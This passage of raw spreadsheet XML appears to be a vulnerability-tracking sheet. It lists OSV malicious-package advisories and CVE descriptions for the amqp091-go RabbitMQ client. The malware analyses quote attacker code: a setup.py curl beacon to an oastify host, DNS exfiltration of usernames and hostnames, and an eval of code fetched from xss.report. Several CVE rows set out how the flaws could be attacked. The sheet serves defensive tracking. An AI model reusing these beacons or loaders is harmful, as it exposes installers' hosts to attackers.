      <c r="D55" s="5" t="inlineStr"/>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="inlineStr"/>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-asetwe</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr"/>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c0316bf059751a9ece4fb034e225276529692338dc671ad9929e16faf8c843d5)
setup.py of requests-asetwe unconditionally executes `os.system('curl -s https://w5223hr2yr968bhwql8bv5n8ozuqih66.oastify.com')` during `pip install`. The destination is a Burp Collaborator (oastify.com) subdomain — an out-of-band interaction service used to confirm code execution and collect the victim's IP/DNS metadata on the attacker's collaborator instance. The package name is a lookalike of the widely-used `requests` package, and the shipped setup.py has no legitimate reason to contact an anonymous oastify subdomain at install time. Installing the package causes the installer's host to beacon to attacker-controlled infrastructure automatically.
## Source: kam193 (7078a9b4fc2be32cbeb1f2c20ec67834c8e293bd410ceeb4842cacd8340d9835)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5" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16269</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16270</t>
        </is>
      </c>
      <c r="D56" s="5" t="inlineStr"/>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="inlineStr"/>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:@tink/tink-link-core</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr"/>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (826e81131e7b2a296324d469c10f1e44d5b33683703c8a2e0f101a8674c1cfcf)
The package impersonates the Tink open-banking SDK (name @tink/tink-link-core, description 'Enterprise-grade client core for open banking', homepage github.com/tink-link/core) but its actual behavior is host reconnaissance and DNS exfiltration. The package.json install script runs `node index.js`, and both the install entry and main entry load lib/core.js, which reads os.userInfo().username, os.hostname(), and process.cwd(), joins them with a prefix and a hardcoded domain as DNS labels, and issues a dns.resolve4() lookup. The destination hostname and module/API names are reconstructed at runtime from hex byte arrays via Buffer.from(...).toString('utf8') in lib/b02e30.js and lib/6ad264.js — the decoded domain is oob.algamil7x.xyz and the label prefix is tinkcore. Module names 'os','dns','process' and API names 'userInfo','hostname','cwd','resolve4' are loaded via module.constructor._load with hex-decoded strings to hide them from static review. DNS-based egress bypasses HTTP proxy and firewall controls. The beacon fires automatically on `npm install` (via the install lifecycle script) and again on `require()` of the package, giving the attacker installer username, hostname, and current working directory for every affected environment.
</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16270</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16271</t>
        </is>
      </c>
      <c r="D57" s="5" t="inlineStr"/>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="inlineStr"/>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>npm:test89078-auth</t>
        </is>
      </c>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr"/>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c1ac938360c682e2489d11de9278697e7e2e85d73c612d2ab60ed28553bb5573)
The package's preinstall script (scripts.preinstall = 'node index.js') runs automatically on npm install and collects os.userInfo().username and os.hostname(), then issues a dns.lookup against a subdomain of 31ee29fe-db68-4fd3-86a2-2b707b9e95f0.dnshook.site with the username and hostname embedded in the queried label. This is a DNS-based exfiltration beacon: installing the package transmits installer host identifiers to a non-first-party canary domain over DNS resolution at install time. The version number 99.99.99 and package name shape are consistent with a dependency-confusion lure targeting an internal package name.
</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16271</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16273</t>
        </is>
      </c>
      <c r="D58" s="5" t="inlineStr"/>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="inlineStr"/>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>npm:blue-string-formatter-utils</t>
        </is>
      </c>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr"/>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (aa3c9f5edcc636fc8d38e40a6bb225aed8f6b638be31f2abf8b6e747212c9565)
The package advertises itself as 'Utility helpers for string formatting' but its shipped main file performs a single behavior: an XMLHttpRequest GET to the protocol-relative URL //xss.report/c/k3rne111 whose response body is passed directly to eval(). Any require()/import of this package causes arbitrary attacker-controlled JavaScript from xss.report to execute in the consumer's Node process, with no pinning, no integrity check, and no relationship to the advertised functionality. The mismatch between the package's stated purpose (string utilities) and its actual contents (a remote-code loader) is a cover-story pattern.
</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16273</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16274</t>
        </is>
      </c>
      <c r="D59" s="5" t="inlineStr"/>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="inlineStr"/>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-auroras</t>
        </is>
      </c>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr"/>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (afa39517de816c01400eef99ef6ebce1357910c217c5e0ff55e4a252ea15a4c5)
During installation, package starts a reverse shell.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-requests-triwes
Reasons (based on the campaign):
 - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16274</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16275</t>
        </is>
      </c>
      <c r="D60" s="5" t="inlineStr"/>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="inlineStr"/>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-triwes</t>
        </is>
      </c>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr"/>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (fa01be0759de95b7a1628930718f7b3bf372eff0c777aace419196e327e77078)
During installation, package starts a reverse shell.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-requests-triwes
Reasons (based on the campaign):
 - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16275</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77411</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M61" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr"/>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A critical stream desynchronization vulnerability has been identified in the AMQP wire-protocol parser. When parsing a long string (`readLongstr`) within a table field, providing a length that exceeds the maximum signed 32-bit integer (`2^31 - 1`, or roughly `2.1` GiB) triggers an improper error-handling condition. The parser abruptly aborts the read and returns a success status (`"",nil`) without consuming the specified bytes from the underlying network buffer. This causes all subsequent read operations to become misaligned. The parser interprets arbitrary offsets within the remaining payload bytes as valid AMQP frame headers, leading to potential Remote Code Execution (RCE), data injection, or complete connection hijacking.
**Vulnerability Details**
The vulnerability exists within the bounds-checking logic of the readLongstr function:
```go
// read.go:113-114 — silent no-op return, bytes left in stream
if length &gt; (^uint32(0) &gt;&gt; 1) {
    return  // returns "", nil, does NOT consume `length` bytes
}
```
When `length` evaluates to a value greater than `0x7FFFFFFF`:
1. The function executes a silent `return` statement.
2. Because Go utilizes named or zero-value initialization for unassigned return registers, this yields `"", nil` (indicating a successful read of an empty string).
3. The Critical Failure: The reader's cursor is not advanced by `length` bytes. The malformed payload remains sitting in the TCP/buffer stream.
**Impact**
As `readTable` continues iterating over the stream under the assumption that the string was successfully parsed, the byte alignment is entirely broken.
- Parser Desynchronization: Future AMQP frame headers are read from arbitrary offsets inside the attacker-controlled message payload.
- Payload Reinterpretation: A malicious actor can carefully craft the trailing bytes of the initial payload to perfectly mimic valid AMQP frames (e.g., `connection.close`, `channel.open`, or message publishing frames), forcing the client/server to execute unintended actions.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77411</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77405</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M62" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr"/>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-316, CWE-326</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>## Summary
A structural security weakness exists in the AMQP client's TLS configuration generator (`tlsConfigFromURI`). When constructing a `*tls.Config` object from an `amqps://` connection URI, the library initializes the structure without explicitly defining the `MinVersion` field. 
While modern versions of the Go compiler toolchain (Go 1.18+) default the implicit minimum version to TLS 1.2, this security posture relies entirely on an implicit toolchain dependency. If the library is compiled using legacy Go toolchains (Go &lt; 1.18), or if a future toolchain introduces fallback behavior, the client could silently negotiate obsolete and insecure TLS 1.0 or TLS 1.1 protocols during connection handshakes with a compromised or malicious AMQP broker.
---
## Vulnerability Details
### Mechanism
The vulnerability lies in the lack of an explicit safety floor when assigning configurations inside the URI component:
```go
// Example within uri.go's tlsConfigFromURI
cfg := &amp;tls.Config{
    ServerName: host,
    // MinVersion is left completely unassigned (defaults to 0, or toolchain default)
}
```
In the Go standard library (`crypto/tls`), leaving `MinVersion: 0` instructs the runtime to choose the toolchain's default minimum. Prior to Go 1.18, this default allowed negotiation down to TLS 1.0. Relying on implicit compiler configurations violates secure coding practices by decoupling the library's security posture from its source code, leaving applications vulnerable based solely on how they are built.
### Impact
If a client application is built with a legacy compiler environment or a custom Go runtime, an attacker capable of executing a Man-in-the-Middle (MitM) attack can force the connection to downgrade to TLS 1.0 or 1.1. This exposes the AMQP protocol data stream to well-known cryptographic vulnerabilities (such as BEAST, POODLE, or SWEET32), allowing the attacker to decrypt or alter message payloads, connection parameters, and authentication credentials.
---
## Attack Vector
An attacker performing a network-level downgrade attack can intercept a client connection built under a legacy toolchain:
1. **Interception:** A client application compiled on a legacy pipeline attempts to establish an encrypted connection to an AMQP broker.
2. **Protocol Downgrade:** The attacker intercepts the TLS Client Hello handshake and forces a downgrade negotiation to TLS 1.0.
3. **Cryptographic Exploitation:** Because `MinVersion` was never explicitly locked to `tls.VersionTLS12` by the library, the client accepts the weak cipher suites, allowing the attacker to monitor or manipulate the underlying AMQP session data.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77405</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77408</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M63" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr"/>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>## Summary
A data integrity and protocol corruption vulnerability exists in the AMQP client's property serialization logic. When encoding AMQP short string (`shortstr`) fields—such as identifiers, routing strings, and content metadata—the length of the string is explicitly cast to a fixed-size 8-bit unsigned integer (`uint8`). 
If an application provides a property string exceeding 255 bytes, the length counter silently wraps around (e.g., a length of 300 wraps to 44). As a result, the parser writes only a truncated portion of the string into the outgoing connection buffer without returning an error. This leads to silent data corruption, broken RPC routing, and unpredictable broker-side state behavior.
---
## Vulnerability Details
### Mechanism
The vulnerability resides in the wire-level serialization logic for application publishing properties:
```go
// write.go:246
length := uint8(len(b))  // wraps silently when len(b) &gt; 255 (e.g., 300 -&gt; 44)
```
Because Go allows silent integer truncation during explicit type casting, lengths larger than $2^8 - 1$ lose their most significant bits. The underlying stream writer reads `length` to determine how many bytes to pull from the buffer. Because no error or boundary check accompanies this truncation, the application believes the full payload was transmitted successfully.
### Affected Properties
This truncation behavior affects every standard AMQP field serialized as a `shortstr`:
* `CorrelationId`
* `ReplyTo`
* `MessageId`
* `Expiration`
* `UserId`
* `AppId`
* `ContentType`
* `ContentEncoding`
* `Type`
### Impact
The critical consequence is **silent protocol desynchronization at the application layer**. The underlying TCP stream remains framed properly (because the shortened length matches the bytes written), but the business logic is corrupted. Distributed transactions, request-reply correlations, and tracing headers are truncated, causing downstream systems to drop messages or route them to incorrect consumers.
---
## Attack Vector
An attacker who can influence metadata fields processed by an upstream application (such as a user-supplied tracking ID or a long content-type header) can exploit this to break system components:
1. **Targeting RPC Routing:** A user passes a malicious or overly long `CorrelationId` of 300 bytes through an application endpoint.
2. **Silent Truncation:** The library wraps the length value to 44, transmitting only the first 44 bytes to the rabbitMQ broker.
3. **Broken Correlation:** When the service processes the request and responds, the replying consumer attempts to route the message using the full 300-byte identifier. Because the broker only recognizes the truncated 44-byte ID, the reply loop breaks silently, leading to hanging processes or data leaks across transaction boundaries.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77408</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77403</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M64" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr"/>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>## Summary
A Denial of Service (DoS) vulnerability exists in the AMQP client's connection negotiation logic. The AMQP specification explicitly mandates a strict minimum frame size of 4096 bytes to prevent pathological packet fragmentation. While the library defines a `frameMinSize = 4096` constant, the connection negotiation loop fails to enforce this boundary, blindly accepting whatever maximum frame size (`FrameMax`) the server advertises during the handshake.
If a client connects to a malicious or compromised AMQP broker that advertises an extremely low `FrameMax` (such as 1 byte), the negotiation succeeds. Consequently, every subsequent message transmission is forced to splinter into thousands or millions of single-byte frames, causing massive CPU overhead, thread contention, and a near-instantaneous application freeze.
---
## Vulnerability Details
### Mechanism
During the connection establishment phase, the client and server negotiate connection parameters—including maximum channel count, heartbeat intervals, and maximum frame sizes. The vulnerability is located where the client accepts the server's tuning parameters:
```go
// Connection negotiation logic maps server values directly without validation
if serverSettings.FrameMax &gt; 0 {
    // VULNERABILITY: Lacks a floor validation check against frameMinSize (4096)
    c.config.FrameMax = serverSettings.FrameMax 
}
```
Because there is no conditional check asserting that `serverSettings.FrameMax &gt;= frameMinSize`, a value below the protocol specification floor is successfully registered. When the application later passes data payloads to the frame writer, the chunking algorithm splits the payload using the negotiated `FrameMax` value as its chunk window divisor.
### Impact
When `FrameMax` is set to an absurdly low threshold (e.g., 1 to 10 bytes):
* A standard 10 KiB message payload requires tens of thousands of individual write operations and frame headers.
* The system's CPU becomes entirely bound by frame serialization, memory allocation for frame structures, and context switching within the network output loops.
* This results in an application-layer Denial of Service (DoS) affecting not just the specific AMQP connection, but potentially the entire host system due to CPU resource starvation.
---
## Attack Vector
An attacker who compromises an upstream AMQP broker, performs a Man-in-the-Middle (MitM) interception, or tricks an application into connecting to an unauthorized external rogue broker can trigger this vulnerability:
1. **Rogue Handshake:** The client application connects to an AMQP endpoint controlled by the attacker.
2. **Malicious Parameter Tuning:** During the `connection.tune` phase, the rogue server returns a `FrameMax` value of `1`.
3. **Resource Exhaustion Trigger:** The client completes the handshake successfully. As soon as the client attempts to publish a message or process traffic, the internal loop fragments the data into single-byte frames, spiking the host's CPU usage to 100% and disabling the application thread.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77403</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77410</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M65" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr"/>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A flaw in the `recvContent` function allows a malicious AMQP server to trigger an Out-of-Memory (OOM) error, forcing the host operating system or container runtime to immediately terminate the client process.
**Vulnerability Details**
When receiving message content payloads, the client processes the expected size from the content header framework. The `recvContent` function attempts to optimize performance by pre-allocating memory for the message body based on the `ch.header.Size` field, which is a 64-bit unsigned integer (`uint64`).
```go
// channel.go:495-496
if cap(ch.body) == 0 {
    ch.body = make([]byte, 0, ch.header.Size)  // unbounded
}
```
The underlying library fails to validate or cap this requested size against any upper boundary—such as the maximum frame size negotiated during connection establishment (`FrameMax`). If a server specifies an extreme body size (e.g., `2^62` bytes), the Go runtime attempts to allocate an exabyte-scale slice capacity. This immediately exhausts available system memory, causing the operating system's OOM killer to terminate the application.
**Attack Vector / Exploitation Scenario**
- Message Delivery Phase: A malicious or compromised AMQP broker sends a standard `basic.deliver` frame containing a content header with an intentionally inflated `body-size` variable.
- Authentication Requirement: No special privileges or authentication bypasses are required; the crash occurs seamlessly during normal message consumption.
**Impact**
- Availability: High. Exploded memory consumption results in an instant process termination, destroying application state and availability for all threads sharing the environment.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77410</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77412</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M66" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
